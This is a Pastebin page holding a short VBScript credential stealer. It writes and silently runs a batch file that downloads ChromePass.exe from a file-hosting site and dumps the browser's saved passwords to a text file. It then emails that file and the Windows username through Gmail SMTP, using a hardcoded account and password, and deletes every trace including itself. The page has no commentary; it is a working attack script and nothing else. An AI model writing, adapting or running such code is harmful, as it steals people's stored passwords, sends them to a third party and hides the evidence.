Advertisement
Guest User

Untitled

a guest
Feb 7th, 2017
90
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.16 KB | None | 0 0
  1. Dim FSO, juan, shell
  2. Set shell = CreateObject("WScript.Shell")
  3. Set FSO = CreateObject("Scripting.FileSystemObject")
  4. Set juan = FSO.OpenTextFile("a.bat", 2, True)
  5. With juan
  6. .WriteLine "powershell wget -Uri 'https://ddl2.data.hu/get/241135/10305370/ChromePass.exe' -OutFile a.exe"
  7. .WriteLine "powershell exit"
  8. .WriteLine "start a.exe /stext a.txt"
  9. .writeline "echo %username% > aa.txt"
  10. .writeline "powershell $a= get-content a.txt ;$aa= get-content aa.txt; $SMTPServer = 'smtp.gmail.com' ; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ; $SMTPInfo.EnableSsl = $true ; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('cuentax228@gmail.com', '123456789pene') ; $ReportEmail = New-Object System.Net.Mail.MailMessage ; $ReportEmail.From = 'cuentax228@gmail.com' ; $ReportEmail.To.Add('cuentax228@gmail.com') ; $ReportEmail.Subject = $aa ; $ReportEmail.Body = ($a) ; $SMTPInfo.Send($ReportEmail)"
  11. .writeline "powershell del a.txt"
  12. .writeline "powershell del a.exe"
  13. .writeline "powershell del aa.txt"
  14. .writeline "powershell del a.vbs"
  15. .writeline "powershell del a.bat"
  16. .Close
  17. shell.Run "a.bat",vbhide
  18. End With
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement